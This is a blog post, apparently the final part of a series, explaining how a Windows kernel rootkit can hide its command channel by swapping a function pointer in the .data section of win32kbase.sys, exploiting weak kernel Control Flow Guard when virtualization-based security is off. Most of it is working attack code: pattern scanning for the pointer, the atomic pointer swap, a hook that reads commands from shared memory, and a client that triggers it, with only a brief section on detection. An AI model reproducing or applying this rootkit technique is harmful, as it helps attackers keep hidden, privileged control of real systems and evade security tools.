(Anti-)Anti-Rootkit Techniques - Part III: Hijacking Pointers

In Part II of this series, we looked at how to hide our rootkit's thread from the eyes of a vigilant anti-rootkit by tampering with the PspCidTable, and how an anti-rootkit can detect such tampering. In this final part of the trilogy, we will get rid of the main thread in our rootkit and implement a "threadless" user-to-kernel communication that is essentially immune to most detections of this kind. (Of course you cannot execute code without a thread; "threadless" here means not having a looping thread.)

User-To-Kernel Communications

As discussed in the previous parts, we can use neither IOCTLs nor a looping kernel thread that polls e.g. a shared memory object for commands, as both are detected by our anti-rootkit. But if we cannot use those, how do we initiate a call from userland (from our rootkit control client) into kernel code?

Well, you are doing exactly that each time you execute an Nt* syscall wrapper - you set up the arguments and issue a syscall, which transfers control to the kernel. What we could do, then, is place a simple trampoline hook on the respective kernel-level code in the driver's .text section, which transfers control to our rootkit. But that is almost as noisy as full "driver stomping" and can be detected with the same simple integrity checks discussed in Part II.

But what if that driver calls a function pointer stored in a section that is more likely to change, and thus harder to run integrity checks on, such as the .data section? Luckily (for us) there are some drivers which call kernel functions through pointers in the .data section. All we need to do is swap a single pointer in a section that might be subject to memory changes anyway, and we can redirect the control flow to our rootkit. This user-to-kernel communication method is known in the game cheating community as a .data ptr swap and ticks all our boxes.

The .data ptr swap

The .data section contains all static variables and is usually subject to change at runtime, as opposed to (usually) read-only segments such as .rodata or .text. Functions that can be triggered from userland and call a function pointer stored in the .data segment can be found anywhere, but one driver that is known to contain many of them is the session driver win32k.sys and (on modern systems) win32kbase.sys and win32kfull.sys. These drivers handle all the GUI/GDI related NtGdi* and NtUser* syscalls.

How do we find a pointer to swap? (Kernel) Control Flow Guard (kCFG) actually gives us a handy pointer towards finding them. Let's look at one example function in win32k.sys which calls a function stored as a pointer in the .data section:

It moves a .data ptr into rax, validates if the pointer is NULL, and if it is not, we see it calling __guard_dispatch_icall_fptr_. In pseudocode:

__int64 (*NtUserBeginLayoutUpdate())(void)
{
  __int64 (*result)(void); // rax

  result = example_data_ptr;
  if ( example_data_ptr )
    return (__int64 (*)(void))example_data_ptr(); // `__guard_dispatch_icall_fptr_`
  return result;
}

__guard_dispatch_icall_fptr_ is a call inserted by kCFG that checks whether a function pointer is a valid target (by checking if it is in the kCFG bitmap) and blocks the execution if it is not. This in turn means that by simply xref-ing calls to this function, we get a handy list of all functions in a driver that call through a .data pointer!

Ok, now you might be thinking (and so was I): isn't this hijacking exactly what kCFG is supposed to prevent? Well, technically you are right, but if Virtualization Based Security (VBS) is disabled, the check is essentially bypassed (see e.g. here) and kCFG only checks that an address is a valid kernel address and not a usermode one. VBS is enabled by default on newer Windows installs, but only if specific hardware requirements are met, so there is definitely a chance that it is disabled on a workstation or, more likely, some server. Otherwise, a kCFG bypass would be needed.

We can verify that kCFG is essentially bypassed if VBS is disabled by looking at the implementation/decompilation of __guard_dispatch_icall_fptr_ in ntoskrnl.exe in IDA:

__int64 __fastcall guard_dispatch_icall()
{
  ULONG_PTR fptr; // rax

  // check if it is a usermode address
  if ((fptr & 0x8000000000000000uLL) == 0LL)
    goto USERMODE_ADDR_DETECTED; // Invoke bugcheck (BSOD)

  // Validate guard_icall_bitmap (0 if no VBS)
  if (guard_icall_bitmap) 
  {
    // CFG logic [ ... ]
  }

  // [ ... ]

  // Validate retpoline_image_bitmap (0 if no VBS)
  if (retpoline_image_bitmap) 
  {
    // CFG logic [ ... ]
  }

  // Execute our function pointer
  return ((__int64 (*)(void))fptr)();
}

We can validate that both bitmaps are NULL on a system without VBS using WinDbg:

So kCFG is not going to be in our way, assuming we do not have a hardened environment with VBS.
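
To make that concrete, here is a minimal userland sketch of what the dispatch routine effectively still verifies when both bitmaps are NULL. The function name passes_guard_without_vbs is made up for illustration; only the top-bit test is taken from the decompilation above, and everything the real routine does with the bitmaps is left out.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical model of the one check that remains when both bitmaps are NULL:
// the call target must have the top address bit set, i.e. it must lie in the
// kernel half of the x64 address space.
constexpr bool passes_guard_without_vbs(std::uint64_t target)
{
    return (target & 0x8000000000000000ULL) != 0;
}
```

Any address in the kernel half passes this test, no matter which module (if any) backs it, which is why an unbacked rootkit allocation is accepted as a call target in this configuration.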

Looking for more pointers

However, while the example NtUserBeginLayoutUpdate call is good for showcasing the .data pointer concept, it is actually not well suited for our use case: the function is not exported, and it is not easy to write a signature for, since many functions in that driver look alike (being just a wrapper for a .data ptr). But now that we got the concept down, let us look at win32kbase.sys and look for more.

We can start by simply xref-ing calls to __guard_dispatch_icall_fptr_, which gets us a handy list of all call sites that go through a .data pointer in this driver. Filtering for Nt, we find all of those that we can reach from usermode with a call to an NtUser* or an NtGdi* function. Functions starting with Api* are also good targets, because many of the Nt* functions wrap around one of those. Now we have a list of potential targets for our communication method:

Of course, some of these functions will validate their arguments before getting to the call we want to hijack, so we could try to look for those where the offset from the function start to the kCFG call is a low value (to keep reverse engineering efforts low) and then reverse them to understand how we can get through to the .data pointer call.
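
The "low offset first" heuristic is easy to script once the xref list is exported. Below is a rough sketch of that ranking step; the Candidate struct, its field names and rankCandidates are all invented for this example and do not correspond to any disassembler API.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// One xref result: a function and the address of its guarded indirect call.
// The struct and its field names are illustrative only.
struct Candidate {
    std::string   name;
    std::uint64_t functionStart;
    std::uint64_t guardedCallSite;

    std::uint64_t offsetToCall() const {
        assert(guardedCallSite >= functionStart);
        return guardedCallSite - functionStart;
    }
};

// Keep candidates whose guarded call sits within maxOffset bytes of the
// function start, sorted so the shortest path to the call comes first.
std::vector<Candidate> rankCandidates(std::vector<Candidate> all, std::uint64_t maxOffset)
{
    all.erase(std::remove_if(all.begin(), all.end(),
                  [maxOffset](const Candidate& c) { return c.offsetToCall() > maxOffset; }),
              all.end());
    std::sort(all.begin(), all.end(),
              [](const Candidate& a, const Candidate& b) {
                  return a.offsetToCall() < b.offsetToCall();
              });
    return all;
}
```

A small offset is only a hint that little validation happens before the call, so each surviving candidate still needs to be reversed by hand.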

At first I was looking only for function pointers that take arguments, so that I could pass parameters to the kernel, which is necessary if we want to execute something more nuanced. Unfortunately, we cannot just populate the registers, call the routine and then read them from the kernel, as the kernel only copies over those arguments that are needed. This info is stored in the KiArgumentTable of the KeServiceDescriptorTable<Shadow> aka the SSDT. That is why many public implementations rely on pointers with arguments (e.g. https://github.com/Guyy99/data-ptr-driver or https://github.com/0mWindyBug/DataptrHooks) - here you pass a magic value and a command block as parameters and then, in your hook, check if the magic value is present and, if it is, parse the command block and execute the respective functions. While this approach works great, I wanted something slightly different.
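
For readers who have not seen the magic-value pattern before, here is a plain userland simulation of the idea. It is a sketch of the general pattern only and is not taken from either linked project: kMagic, CommandBlock, originalTarget and hookedTarget are all hypothetical names, and a real hook would additionally have to validate the user-supplied pointer before touching it.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical marker value and layout, chosen only for this example.
constexpr std::uint64_t kMagic = 0x42414E5348454521ULL;

struct CommandBlock {
    std::uint32_t command;  // what the caller wants done
    std::int32_t  status;   // filled in by the hook
};

using TargetFn = std::int64_t (*)(std::uint64_t, void*);

// Stand-in for the routine the pointer originally referenced.
static std::int64_t originalTarget(std::uint64_t, void*) { return 7; }

static TargetFn g_original = originalTarget;

// The hook only acts when the magic value is present; every other caller
// is forwarded to the original routine unchanged.
static std::int64_t hookedTarget(std::uint64_t maybeMagic, void* maybeBlock)
{
    if (maybeMagic == kMagic && maybeBlock != nullptr) {
        auto* block = static_cast<CommandBlock*>(maybeBlock);
        block->status = 0;  // pretend the command succeeded
        return 0;
    }
    return g_original(maybeMagic, maybeBlock);
}
```

The important property is the fall-through: legitimate callers never notice the hook, because anything without the marker goes straight to the original routine.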

Synthesis

By combining this technique with the shared memory technique from Part I, we can use ANY pointer, regardless of the number of arguments - we just write our command into the shared memory section and let the hooked pointer trigger the rootkit to poll the command from this buffer. Really, any IPC method would work; we might as well simply write into a file somewhere and read it from the driver.

This little twist greatly increases the number of functions we can choose from. If we hook a function that is called at a certain interval by Windows anyway, we would not even need a client anymore - we could just write the command into a file and wait until the hooked Nt* routine calls our pointer. However, I wanted something to trigger manually, so I went with one of the many NtUser* functions that wrap an ApiSet* routine, namely NtUserCreateWindowStation, which simply wraps ApiSetEditionCreateWindowStationEntryPoint:

The .data pointer in ApiSetEditionCreateWindowStationEntryPoint is invoked after only one simple check, IsEditionGetProcessWindowStationEntryPointSupported, which on my version of Windows returns true. Any call to that routine will thus invoke the pointer and with that, my rootkit code.

Now, to extract the address of the pointer we just sigscan for it (see Part I and Part II of this series for an explanation). As the ApiSet* routine starts immediately after the NtUser* call, we do not have to resolve its address first but can start from NtUserCreateWindowStation. This time I even bothered to implement a dedicated function with a mask (yay) so the sigscanning is much easier (as always, error handling excluded for brevity):

// 
// Resolve NtUserCreateWindowStation
//
PVOID funcAddr = Memory::EvscGetSystemRoutineAddress(L"win32kbase.sys", "NtUserCreateWindowStation");

// 
// Find the dataPtr
//
ULONG_PTR dataPtrPattern = (ULONG_PTR)Memory::EvscFindPattern(
    (PVOID)(funcAddr),
    200, 
    "\x48\x8B\x05\x00\x00\x00\x00\x48\x85\xC0", 
    "xxx????xxx"
);

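// Read the signed 32-bit displacement of the matched `mov rax, [rip+disp32]`
LONG offset = *(PLONG)(dataPtrPattern + 3);

// Apply offset to get address of the .data ptr (RIP-relative to the next
// instruction: 3 opcode bytes + 4 displacement bytes)
g_dataPtrAddress = dataPtrPattern + offset + 3 + 4;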
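
If you want to play with the signature logic outside of a driver, the two steps (masked scan, then resolving the RIP-relative operand) can be sketched in portable C++ like this. This is not Banshee's EvscFindPattern, whose exact signature is not shown here; findPattern and resolveRipRelative are hypothetical helpers written for this example, and they assume a little-endian host.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Returns the offset of the first match of `pattern` in `data`, or -1.
// A '?' in `mask` matches any byte; any other mask character demands equality.
static std::ptrdiff_t findPattern(const std::uint8_t* data, std::size_t size,
                                  const std::uint8_t* pattern, const char* mask)
{
    const std::size_t len = std::strlen(mask);
    if (len == 0 || len > size) return -1;
    for (std::size_t i = 0; i + len <= size; ++i) {
        std::size_t j = 0;
        while (j < len && (mask[j] == '?' || data[i + j] == pattern[j])) ++j;
        if (j == len) return static_cast<std::ptrdiff_t>(i);
    }
    return -1;
}

// Resolves the memory operand of `mov rax, [rip+disp32]` (48 8B 05 <disp32>).
// `instrAddress` is the address the instruction has at runtime.
static std::uint64_t resolveRipRelative(const std::uint8_t* instr, std::uint64_t instrAddress)
{
    std::int32_t disp;
    std::memcpy(&disp, instr + 3, sizeof(disp));  // disp32 follows the 3 opcode bytes
    // RIP points at the next instruction, 7 bytes after the start of this one.
    return instrAddress + 7 + static_cast<std::int64_t>(disp);
}
```

The mask is what makes the signature survive rebuilds: the four displacement bytes change with every build of the driver, while the opcode bytes around them tend to stay the same.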

With the address of our pointer, we can simply exchange it with a pointer to our hook:

// 
// Swap with our hook and save original in g_pOriginalFunction
//
*(PVOID*)&g_pOriginalFunction /* cursed cast */ = _InterlockedExchangePointer((PVOID*)g_dataPtrAddress, HookedFunction);
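
The same swap can be modelled in userland with std::atomic, which is handy for reasoning about ordering without a kernel debugger attached. This is a toy simulation under my own naming (g_slot, g_saved, swapSlot and friends are not part of the PoC), with a static variable standing in for the .data slot.

```cpp
#include <atomic>
#include <cassert>

using Handler = int (*)(int);

static int benignHandler(int x) { return x + 1; }

// Stand-in for a function pointer living in a writable data section.
static std::atomic<Handler> g_slot{benignHandler};
static Handler g_saved = nullptr;

// Replacement that does its own work and then forwards to the saved original.
static int replacementHandler(int x) { return g_saved(x) * 10; }

// Publish the new target and capture the old one in a single atomic step, so a
// concurrent caller sees either the old or the new pointer, never a torn value.
static void swapSlot(Handler replacement)
{
    g_saved = g_slot.exchange(replacement);
}

// What a caller of the slot does: load the pointer, check for NULL, call it.
static int callThroughSlot(int x)
{
    Handler h = g_slot.load();
    return h ? h(x) : 0;
}
```

One thing the model makes visible: the exchange publishes the replacement before the old value has been stored in g_saved, so a caller racing with the swap could enter the replacement while g_saved is still NULL. Reading the slot into g_saved before exchanging is one option to narrow that window.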

In the hook function we can then poll for a command payload in a shared memory object and, if we got a new command (where the executed flag is not set), execute it. (If you wanna look at how to set up a shared memory object and map it in a driver, see Banshee's source code.)

INT HookedFunction(int a1, int a2, int a3, int a4, int a5, __int64 a6, __int64 a7, int a8)
{
    DbgPrint("[*] Hook triggered\r\n");

    if (ExGetPreviousMode() == UserMode && g_pSharedMemory)
    {
        KAPC_STATE apc = { 0 };
        KeStackAttachProcess(g_pWinlogon, &apc);

        // Read command payload
        PAYLOAD payload = *(PAYLOAD*)g_pSharedMemory;
        DbgPrint("[*] Got command: %i\r\n", payload.cmdType); // here you could execute e.g. callback remove, process elevation etc
        (*((PAYLOAD*)g_pSharedMemory)).executed = 1; // mark as executed
        (*((PAYLOAD*)g_pSharedMemory)).status = 0; // return status

        KeUnstackDetachProcess(&apc);
    }

    return g_pOriginalFunction(a1, a2, a3, a4, a5, a6, a7, a8);
}
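
The executed flag is effectively a tiny handshake protocol between client and hook. Here is an in-process sketch of it, assuming a payload layout of my own: only cmdType, executed and status appear in the code above, the rest (field types, submitCommand, pollCommand) is invented. Unlike the PoC, where a zeroed payload counts as pending, this sketch starts with executed set so that an empty buffer is never mistaken for a command.

```cpp
#include <atomic>
#include <cassert>
#include <cstdint>

// Hypothetical payload layout for illustration.
struct Payload {
    std::uint32_t cmdType = 0;
    std::int32_t  status  = 0;
    std::atomic<std::uint32_t> executed{1};  // 1 = nothing pending
};

// Writer side: fill in the command first and clear `executed` last, so the
// consumer never observes a half-written command.
static void submitCommand(Payload& p, std::uint32_t cmd)
{
    p.cmdType = cmd;
    p.status  = -1;
    p.executed.store(0, std::memory_order_release);
}

// Consumer side: returns true if a pending command was handled.
static bool pollCommand(Payload& p)
{
    if (p.executed.load(std::memory_order_acquire) != 0)
        return false;                        // nothing new
    p.status = 0;                            // pretend the command succeeded
    p.executed.store(1, std::memory_order_release);
    return true;
}
```

Because the hook fires for every caller of the hijacked routine, checking the flag before doing any work also keeps unrelated calls from re-running a stale command.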

Now we can write a simple client that opens the shared memory, writes a payload to it and then triggers the hook by calling our NtUser* function from earlier (either directly or, for stability, through legitimate winapi usage):

// Create file mappings for command shared memory region
HANDLE hMapFile = OpenFileMappingW(FILE_MAP_ALL_ACCESS, FALSE, L"Global\\Rootkit");
PAYLOAD* pSharedBuf = (PAYLOAD*)MapViewOfFile(hMapFile, FILE_MAP_ALL_ACCESS, 0, 0, sizeof(PAYLOAD));

// Write command to shared mem
PAYLOAD payload = { 0 };
payload.cmdType = CMD_LOG_MESSAGE;
RtlCopyMemory(pSharedBuf, &payload, sizeof(PAYLOAD));

// Trigger hook by calling a function that ends up calling our NtUser* routine 
HWINSTA hWinSta = CreateWindowStationA(
    "MyWinStation",
    0,
    WINSTA_ALL_ACCESS,
    NULL
);

// Wait for execution and get status
while (!pSharedBuf->executed)
    Sleep(1000);
std::cout << "[*] Status: " << pSharedBuf->status << std::endl;

That's it! Now we have a usermode-to-kernel IPC that does not depend on any continuously running system thread, which could be easily detected by an anti-rootkit:

I uploaded the PoC code here.

Detection vectors

The intuitive approach to detecting this technique would be to look up all the possible .data pointers in the standard Windows drivers and have an anti-rootkit check whether they point to memory backed by a driver. While this might be somewhat feasible for pointers with parameters, checking all pointers would be a tough endeavour, since the shared memory technique does not rely on parameters. Also, pointer chains can be used so that only the last pointer points to the rootkit, meaning an anti-rootkit would need to walk the whole chain. And as soon as signed & benign third-party drivers with hijackable pointers come into play, the number of pointers to check grows dramatically, making this approach even more pointless.
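
The core of that intuitive check is simple, which is why it is tempting. A rough sketch, assuming the anti-rootkit has already collected the loaded module ranges and the current value of each pointer slot (ModuleRange, Slot, isBacked and findUnbackedSlots are hypothetical names, and collecting the inputs is the hard part that is not shown):

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

struct ModuleRange {
    std::uint64_t base;
    std::uint64_t size;
};

// A known function pointer slot and the value it currently holds.
struct Slot {
    std::uint64_t slotAddress;
    std::uint64_t target;
};

// True if `address` falls inside any known module image.
static bool isBacked(std::uint64_t address, const std::vector<ModuleRange>& modules)
{
    for (const ModuleRange& m : modules)
        if (address >= m.base && address - m.base < m.size)
            return true;
    return false;
}

// Returns the addresses of all non-NULL slots whose target is not backed.
static std::vector<std::uint64_t> findUnbackedSlots(const std::vector<Slot>& slots,
                                                    const std::vector<ModuleRange>& modules)
{
    std::vector<std::uint64_t> suspicious;
    for (const Slot& s : slots)
        if (s.target != 0 && !isBacked(s.target, modules))
            suspicious.push_back(s.slotAddress);
    return suspicious;
}
```

Note that this only inspects the first hop: a slot pointing into another benign driver passes the check, so it does nothing against the pointer chains mentioned above.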

However, all callstack based detections from Part I, especially the NMI based approach, are still valid. Callstacks that start in userland, calling e.g. an NtUser* function and ending up in an unbacked kernel memory region could indicate a potential rootkit communication routine and can get our rootkit detected.

Still, we definitely reduced the detection surface of our driver: by simply exchanging a pointer in the .data section of a benign driver, a thread only executes our memory when the rootkit code actually needs to run.

While this concludes my trilogy on (anti-)anti-rootkit measures, there is much more to discover and explore which one could talk about. For now, I have other things to discover, and my son will be saying Hello World in a month :) But maybe I will get back to this series some day for a part IV or V.

Until then,

Happy Hacking!

Credits

Thanks to Ido Veltzmann and 0xWindyBug for answering some questions about kCFG <3